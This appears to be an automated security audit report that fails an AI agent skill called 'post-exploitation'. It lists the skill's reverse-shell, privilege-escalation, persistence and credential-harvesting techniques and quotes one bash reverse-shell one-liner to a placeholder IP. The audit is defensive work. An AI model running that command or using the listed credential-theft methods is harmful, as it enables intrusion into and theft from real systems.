post-exploitation
Fail
Audited by Gen Agent Trust Hub on Jul 31, 2026
Risk Level: HIGHCOMMAND_EXECUTIONCREDENTIALS_UNSAFEDATA_EXFILTRATIONREMOTE_CODE_EXECUTION
Full Analysis
- [COMMAND_EXECUTION]: The skill provides functional one-liners for establishing reverse shells (e.g.,
bash -i >& /dev/tcp/IP/4444 0>&1) and upgrading them to interactive PTY shells using Python. - [PRIVILEGE_ESCALATION]: The instructions detail numerous methods for gaining elevated permissions, including exploiting SUID binaries, Docker group memberships, and using Windows-specific escalation tools like PrintSpoofer and GodPotato.
- [PERSISTENCE_MECHANISMS]: The skill outlines several ways to maintain access to a compromised system, such as modifying cron jobs, systemd timers, SSH authorized_keys, and Windows Registry Run keys.
- [DATA_EXPOSURE_AND_EXFILTRATION]: The skill directs the agent to harvest credentials from sensitive locations including
.bash_history,.my.cnf,.netrc, and.git-credentials, and describes Pass-the-Hash techniques for lateral movement. - [UNVERIFIABLE_DEPENDENCIES_AND_REMOTE_CODE_EXECUTION]: The skill references a wide array of third-party offensive tools (LinPEAS, Mimikatz, Sliver, Havoc, chisel, etc.) which are typically downloaded and executed to facilitate exploitation and Command & Control (C2) operations.
Recommendations
- AI detected serious security threats
Audit Metadata